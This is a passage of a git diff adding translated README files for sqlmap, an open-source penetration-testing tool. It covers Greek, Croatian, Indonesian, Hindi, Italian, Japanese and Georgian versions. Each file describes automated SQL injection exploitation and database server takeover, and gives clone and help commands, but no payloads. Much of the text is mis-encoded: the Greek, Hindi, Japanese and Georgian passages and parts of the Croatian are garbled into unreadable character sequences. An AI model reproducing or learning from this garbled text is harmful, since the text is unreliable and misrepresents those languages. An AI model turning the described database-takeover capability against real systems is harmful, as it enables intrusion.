πατήστε: + + python sqlmap.py -h + +Για να πάÏετε μια λίστα από όλες τις επιλογές πατήστε: + + python sqlmap.py -hh + +ΜποÏείτε να δείτε ένα δείγμα λειτουÏγίας του Ï€ÏογÏάμματος [εδώ](https://asciinema.org/a/46601). 
+Για μια γενικότεÏη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηÏιζόμενων χαÏακτηÏιστικών και πεÏιγÏαφή για όλες τις επιλογές, μαζί με παÏαδείγματα, καλείστε να συμβουλευτείτε το [εγχειÏίδιο χÏήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ΣÏνδεσμοι +---- + +* ΑÏχική σελίδα: https://sqlmap.org +* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ΠÏοβλήματα: https://github.com/sqlmapproject/sqlmap/issues +* ΕγχειÏίδιο ΧÏήστη: https://github.com/sqlmapproject/sqlmap/wiki +* Συχνές ΕÏωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md new file mode 100644 index 00000000000..45d5eaad1f9 --- /dev/null +++ b/doc/translations/README-hr-HR.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoÅ¡tvom korisnih opcija za napredno penetracijsko testiranje te Å¡iroki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datoteÄnom sustavu i izvrÅ¡avanja komandi na operacijskom sustavu koriÅ¡tenjem tzv. "out-of-band" veza. + +Slike zaslona +---- + +![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od znaÄajki na wiki stranicama. + +Instalacija +---- + +Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap radi bez posebnih zahtjeva koriÅ¡tenjem [Python](https://www.python.org/download/) verzije **2.7** i/ili **3.x** na bilo kojoj platformi. + +KoriÅ¡tenje +---- + +Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: + + python sqlmap.py -h + +Kako biste dobili listu svih opcija i prekidaÄa koristite: + + python sqlmap.py -hh + +Možete pronaći primjer izvrÅ¡avanja [ovdje](https://asciinema.org/a/46601). 
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih znaÄajki te opis svih opcija i prekidaÄa, zajedno s primjerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Poveznice +---- + +* PoÄetna stranica: https://sqlmap.org +* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues +* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki +* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md new file mode 100644 index 00000000000..f82bf71d2ec --- /dev/null +++ b/doc/translations/README-id-ID.md @@ -0,0 +1,53 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap adalah perangkat lunak sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data. + +sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Perangkat lunak ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. + +Tangkapan Layar +---- + +![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. + +Instalasi +---- + +Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi **2.7** dan **3.x** pada platform apapun. + +Penggunaan +---- + +Untuk mendapatkan daftar opsi dasar gunakan perintah: + + python sqlmap.py -h + +Untuk mendapatkan daftar opsi lanjutan gunakan perintah: + + python sqlmap.py -hh + +Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). + +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. 
Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Tautan +---- + +* Situs: https://sqlmap.org +* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues +* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki +* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos) +* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-in-HI.md b/doc/translations/README-in-HI.md new file mode 100644 index 00000000000..b311f81afe3 --- /dev/null +++ b/doc/translations/README-in-HI.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap à¤à¤• ओपन सोरà¥à¤¸ पà¥à¤°à¤µà¥‡à¤¶ परीकà¥à¤·à¤£ उपकरण है जो SQL इनà¥à¤œà¥‡à¤•à¥à¤¶à¤¨ दोषों की पहचान और उपयोग की पà¥à¤°à¤•à¥à¤°à¤¿à¤¯à¤¾ को सà¥à¤µà¤šà¤²à¤¿à¤¤ करता है और डेटाबेस सरà¥à¤µà¤°à¥‹à¤‚ को अधिकृत कर लेता है। इसके साथ à¤à¤• शकà¥à¤¤à¤¿à¤¶à¤¾à¤²à¥€ पहचान इंजन, अंतिम पà¥à¤°à¤µà¥‡à¤¶ परीकà¥à¤·à¤• के लिठकई निचले विशेषताà¤à¤ और डेटाबेस पà¥à¤°à¤¿à¤‚ट करने, डेटाबेस से डेटा निकालने, नीचे के फ़ाइल सिसà¥à¤Ÿà¤® तक पहà¥à¤à¤šà¤¨à¥‡ और आउट-ऑफ-बैंड कनेकà¥à¤¶à¤¨ के माधà¥à¤¯à¤® से ऑपरेटिंग सिसà¥à¤Ÿà¤® पर कमांड चलाने के लिठकई बड़े रेंज के सà¥à¤µà¤¿à¤š शामिल हैं। + +चितà¥à¤°à¤¸à¤‚वाद +---- + +![सà¥à¤•à¥à¤°à¥€à¤¨à¤¶à¥‰à¤Ÿ](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +आप [विकि पर](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) कà¥à¤› फीचरà¥à¤¸ की दिखाते हà¥à¤ छवियों का संगà¥à¤°à¤¹ देख सकते हैं। + +सà¥à¤¥à¤¾à¤ªà¤¨à¤¾ +---- + +आप नवीनतम तारबाल को [यहां कà¥à¤²à¤¿à¤• करके](https://github.com/sqlmapproject/sqlmap/tarball/master) या नवीनतम ज़िपबॉल को [यहां कà¥à¤²à¤¿à¤• करके](https://github.com/sqlmapproject/sqlmap/zipball/master) डाउनलोड कर सकते हैं। + +पà¥à¤°à¤¾à¤¥à¤®à¤¿à¤•त: आप sqlmap को [गिट](https://github.com/sqlmapproject/sqlmap) रिपॉजिटरी कà¥à¤²à¥‹à¤¨ करके भी डाउनलोड कर सकते हैं: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap [Python](https://www.python.org/download/) संसà¥à¤•रण **2.7** और **3.x** पर किसी भी पà¥à¤²à¥‡à¤Ÿà¤«à¤¾à¤°à¥à¤® पर तà¥à¤°à¤‚त काम करता है। + +उपयोग +---- + +मौलिक विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š की सूची पà¥à¤°à¤¾à¤ªà¥à¤¤ करने के लिà¤: + + python sqlmap.py -h + +सभी विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š की सूची पà¥à¤°à¤¾à¤ªà¥à¤¤ करने के लिà¤: + + python sqlmap.py -hh + +आप [यहां](https://asciinema.org/a/46601) à¤à¤• नमूना चलाने का पता लगा सकते हैं। sqlmap की कà¥à¤·à¤®à¤¤à¤¾à¤“ं की à¤à¤• अवलोकन पà¥à¤°à¤¾à¤ªà¥à¤¤ करने, समरà¥à¤¥à¤¿à¤¤ फीचरà¥à¤¸ की सूची और सभी विकलà¥à¤ªà¥‹à¤‚ और सà¥à¤µà¤¿à¤š का वरà¥à¤£à¤¨, साथ ही उदाहरणों के साथ, 
आपको [उपयोगकरà¥à¤¤à¤¾ मैनà¥à¤¯à¥à¤…ल](https://github.com/sqlmapproject/sqlmap/wiki/Usage) पर परामरà¥à¤¶ दिया जाता है। + +लिंक +---- + +* मà¥à¤–पृषà¥à¤ : https://sqlmap.org +* डाउनलोड: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) या [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* संवाद आरà¤à¤¸à¤à¤¸ फ़ीड: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* समसà¥à¤¯à¤¾ टà¥à¤°à¥ˆà¤•र: https://github.com/sqlmapproject/sqlmap/issues +* उपयोगकरà¥à¤¤à¤¾ मैनà¥à¤¯à¥à¤…ल: https://github.com/sqlmapproject/sqlmap/wiki +* अकà¥à¤¸à¤° पूछे जाने वाले पà¥à¤°à¤¶à¥à¤¨ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* टà¥à¤µà¤¿à¤Ÿà¤°: [@sqlmap](https://x.com/sqlmap) +* डेमो: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* सà¥à¤•à¥à¤°à¥€à¤¨à¤¶à¥‰à¤Ÿ: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md new file mode 100644 index 00000000000..6b074141b41 --- /dev/null +++ b/doc/translations/README-it-IT.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. + +Screenshot +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma. + +Installazione +---- + +Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap è in grado di funzionare con le versioni **2.7** e **3.x** di [Python](https://www.python.org/download/) su ogni piattaforma. + +Utilizzo +---- + +Per una lista delle opzioni e dei controlli di base: + + python sqlmap.py -h + +Per una lista di tutte le opzioni e di tutti i controlli: + + python sqlmap.py -hh + +Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601). 
+Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese). + +Link +---- + +* Sito: https://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki +* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Dimostrazioni: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md new file mode 100644 index 00000000000..d43e3f563e1 --- /dev/null +++ b/doc/translations/README-ja-JP.md @@ -0,0 +1,51 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmapã¯ã‚ªãƒ¼ãƒ—ンソースã®ãƒšãƒãƒˆãƒ¬ãƒ¼ã‚·ãƒ§ãƒ³ãƒ†ã‚¹ãƒ†ã‚£ãƒ³ã‚°ãƒ„ールã§ã™ã€‚SQLインジェクションã®è„†å¼±æ€§ã®æ¤œå‡ºã€æ´»ç”¨ã€ãã—ã¦ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã‚µãƒ¼ãƒå¥ªå–ã®ãƒ—ロセスを自動化ã—ã¾ã™ã€‚ +å¼·åŠ›ãªæ¤œå‡ºã‚¨ãƒ³ã‚¸ãƒ³ã€ãƒšãƒãƒˆãƒ¬ãƒ¼ã‚·ãƒ§ãƒ³ãƒ†ã‚¹ã‚¿ãƒ¼ã®ãŸã‚ã®å¤šãã®ãƒ‹ãƒƒãƒæ©Ÿèƒ½ã€æŒç¶šçš„ãªãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã®ãƒ•ィンガープリンティングã‹ã‚‰ã€ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã®ãƒ‡ãƒ¼ã‚¿å–得やアウトオブãƒãƒ³ãƒ‰æŽ¥ç¶šã‚’介ã—ãŸã‚ªãƒšãƒ¬ãƒ¼ãƒ†ã‚£ãƒ³ã‚°ãƒ»ã‚·ã‚¹ãƒ†ãƒ ä¸Šã§ã®ã‚³ãƒžãƒ³ãƒ‰å®Ÿè¡Œã€ãƒ•ァイルシステムã¸ã®ã‚¢ã‚¯ã‚»ã‚¹ãªã©ã®åºƒç¯„囲ã«åŠã¶ã‚¹ã‚¤ãƒƒãƒã‚’æä¾›ã—ã¾ã™ã€‚ + +スクリーンショット +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +wikiã«è¼‰ã£ã¦ã„ã‚‹ã„ãã¤ã‹ã®æ©Ÿèƒ½ã®ãƒ‡ãƒ¢ã‚’スクリーンショットã§è¦‹ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) + +インストール +---- + +最新ã®tarballã‚’ [ã“ã¡ã‚‰](https://github.com/sqlmapproject/sqlmap/tarball/master) ã‹ã‚‰ã€æœ€æ–°ã®zipballã‚’ [ã“ã¡ã‚‰](https://github.com/sqlmapproject/sqlmap/zipball/master) ã‹ã‚‰ãƒ€ã‚¦ãƒ³ãƒ­ãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ + +[Git](https://github.com/sqlmapproject/sqlmap) レãƒã‚¸ãƒˆãƒªã‚’クローンã—ã¦ã€sqlmapをダウンロードã™ã‚‹ã“ã¨ã‚‚å¯èƒ½ã§ã™ã€‚: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmapã¯ã€ [Python](https://www.python.org/download/) ãƒãƒ¼ã‚¸ãƒ§ãƒ³ **2.7** ã¾ãŸã¯ **3.x** ãŒã‚¤ãƒ³ã‚¹ãƒˆãƒ¼ãƒ«ã•れã¦ã„れã°ã€å…¨ã¦ã®ãƒ—ラットフォームã§ã™ãã«ä½¿ç”¨ã§ãã¾ã™ã€‚ + +使用方法 +---- + +基本的ãªã‚ªãƒ—ションã¨ã‚¹ã‚¤ãƒƒãƒã®ä½¿ç”¨æ–¹æ³•をリストã§å–å¾—ã™ã‚‹ã«ã¯: + + python sqlmap.py -h + +å…¨ã¦ã®ã‚ªãƒ—ションã¨ã‚¹ã‚¤ãƒƒãƒã®ä½¿ç”¨æ–¹æ³•をリストã§å–å¾—ã™ã‚‹ã«ã¯: + + python sqlmap.py -hh + +実行例を [ã“ã¡ã‚‰](https://asciinema.org/a/46601) ã§è¦‹ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ +sqlmapã®æ¦‚è¦ã€æ©Ÿèƒ½ã®ä¸€è¦§ã€å…¨ã¦ã®ã‚ªãƒ—ションやスイッãƒã®ä½¿ç”¨æ–¹æ³•を例ã¨ã¨ã‚‚ã«ã€ [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) 
ã§ç¢ºèªã™ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚ + +リンク +---- + +* ホームページ: https://sqlmap.org +* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* コミットã®RSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 課題管ç†: https://github.com/sqlmapproject/sqlmap/issues +* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki +* よãã‚ã‚‹è³ªå• (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ka-GE.md b/doc/translations/README-ka-GE.md new file mode 100644 index 00000000000..12b59b31ea4 --- /dev/null +++ b/doc/translations/README-ka-GE.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap áƒáƒ áƒ˜áƒ¡ შეღწევáƒáƒ“áƒáƒ‘ის ტესტირებისáƒáƒ—ვის გáƒáƒœáƒ™áƒ£áƒ—ვილი ინსტრუმენტი, რáƒáƒ›áƒšáƒ˜áƒ¡ კáƒáƒ“იც ღიáƒáƒ“ áƒáƒ áƒ˜áƒ¡ ხელმისáƒáƒ¬áƒ•დáƒáƒ›áƒ˜. ინსტრუმენტი áƒáƒ®áƒ“ენს SQL-ინექციის სისუსტეების áƒáƒ¦áƒ›áƒáƒ©áƒ”ნისáƒ, გáƒáƒ›áƒáƒ§áƒ”ნების დრმáƒáƒœáƒáƒªáƒ”მთრბáƒáƒ–áƒáƒ—რსერვერების დáƒáƒ£áƒ¤áƒšáƒ”ბის პრáƒáƒªáƒ”სების áƒáƒ•ტáƒáƒ›áƒáƒ¢áƒ˜áƒ–áƒáƒªáƒ˜áƒáƒ¡. იგი áƒáƒ¦áƒ­áƒ£áƒ áƒ•ილირმძლáƒáƒ•რი áƒáƒ¦áƒ›áƒáƒ›áƒ©áƒ”ნი მექáƒáƒœáƒ˜áƒ«áƒ›áƒ˜áƒ—, შეღწევáƒáƒ“áƒáƒ‘ის პრáƒáƒ¤áƒ”სიáƒáƒœáƒáƒšáƒ˜ ტესტერისáƒáƒ—ვის შესáƒáƒ¤áƒ”რისი ბევრი ფუნქციით დრსკრიპტების ფáƒáƒ áƒ—რსპექტრით, რáƒáƒ›áƒšáƒ”ბიც შეიძლებრგáƒáƒ›áƒáƒ§áƒ”ნებულ იქნეს მრáƒáƒ•áƒáƒšáƒ˜ მიზნით, მáƒáƒ— შáƒáƒ áƒ˜áƒ¡: მáƒáƒœáƒáƒªáƒ”მთრბáƒáƒ–იდáƒáƒœ მáƒáƒœáƒáƒªáƒ”მების შეგრáƒáƒ•ებისáƒáƒ—ვის, ძირითáƒáƒ“ სáƒáƒ¤áƒáƒ˜áƒšáƒ სისტემáƒáƒ–ე წვდáƒáƒ›áƒ˜áƒ¡áƒáƒ—ვის დრout-of-band კáƒáƒ•შირების გზით áƒáƒžáƒ”რáƒáƒªáƒ˜áƒ£áƒš სისტემáƒáƒ¨áƒ˜ ბრძáƒáƒœáƒ”ბáƒáƒ—რშესრულებისáƒáƒ—ვის. + +ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდები +---- + +![ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +შეგიძლიáƒáƒ— ესტუმრáƒáƒ— [ეკრáƒáƒœáƒ˜áƒ¡ áƒáƒœáƒáƒ‘ეჭდთრკáƒáƒšáƒ”ქციáƒáƒ¡](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სáƒáƒ“áƒáƒª დემáƒáƒœáƒ¡áƒ¢áƒ áƒ˜áƒ áƒ”ბულირინსტრუმენტის ზáƒáƒ’იერთი ფუნქციáƒ. + +ინსტáƒáƒšáƒáƒªáƒ˜áƒ +---- + +თქვენ შეგიძლიáƒáƒ— უáƒáƒ®áƒšáƒ”სი tar-áƒáƒ áƒ¥áƒ˜áƒ•ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[áƒáƒ¥](https://github.com/sqlmapproject/sqlmap/tarball/master) დáƒáƒ¬áƒ™áƒáƒžáƒ£áƒœáƒ”ბით, áƒáƒœ უáƒáƒ®áƒšáƒ”სი zip-áƒáƒ áƒ¥áƒ˜áƒ•ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[áƒáƒ¥](https://github.com/sqlmapproject/sqlmap/zipball/master) დáƒáƒ¬áƒ™áƒáƒžáƒ£áƒœáƒ”ბით. + +áƒáƒ¡áƒ”ვე შეგიძლიáƒáƒ— (დრსáƒáƒ¡áƒ£áƒ áƒ•ელიáƒ) sqlmap-ის ჩáƒáƒ›áƒáƒ¢áƒ•ირთვრ[Git](https://github.com/sqlmapproject/sqlmap)-სáƒáƒªáƒáƒ•ის (repository) კლáƒáƒœáƒ˜áƒ áƒ”ბით: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap ნებისმიერ პლáƒáƒ¢áƒ¤áƒáƒ áƒ›áƒáƒ–ე მუშáƒáƒáƒ‘ს [Python](https://www.python.org/download/)-ის **2.7** დრ**3.x** ვერსიებთáƒáƒœ. 
+ +გáƒáƒ›áƒáƒ§áƒ”ნებრ+---- + +ძირითáƒáƒ“ი ვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ”ბისრდრპáƒáƒ áƒáƒ›áƒ”ტრების ჩáƒáƒ›áƒáƒœáƒáƒ—ვáƒáƒšáƒ˜áƒ¡ მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ˜áƒ§áƒ”ნეთ ბრძáƒáƒœáƒ”ბáƒ: + + python sqlmap.py -h + +ვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ”ბისრდრპáƒáƒ áƒáƒ›áƒ”ტრების სრული ჩáƒáƒ›áƒáƒœáƒáƒ—ვáƒáƒšáƒ˜áƒ¡ მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ˜áƒ§áƒ”ნეთ ბრძáƒáƒœáƒ”ბáƒ: + + python sqlmap.py -hh + +გáƒáƒ›áƒáƒ§áƒ”ნების მáƒáƒ áƒ¢áƒ˜áƒ•ი მáƒáƒ’áƒáƒšáƒ˜áƒ—ი შეგიძლიáƒáƒ— იხილáƒáƒ— [áƒáƒ¥](https://asciinema.org/a/46601). sqlmap-ის შესáƒáƒ«áƒšáƒ”ბლáƒáƒ‘áƒáƒ—რმიმáƒáƒ®áƒ˜áƒšáƒ•ის, მხáƒáƒ áƒ“áƒáƒ­áƒ”რილი ფუნქციáƒáƒœáƒáƒšáƒ˜áƒ¡áƒ დრყველრვáƒáƒ áƒ˜áƒáƒœáƒ¢áƒ˜áƒ¡ áƒáƒ¦áƒ¬áƒ”რების მისáƒáƒ¦áƒ”ბáƒáƒ“ გáƒáƒ›áƒáƒ§áƒ”ნების მáƒáƒ’áƒáƒšáƒ˜áƒ—ებთáƒáƒœ ერთáƒáƒ“, გირჩევთ, იხილáƒáƒ— [მáƒáƒ›áƒ®áƒ›áƒáƒ áƒ”ბლის 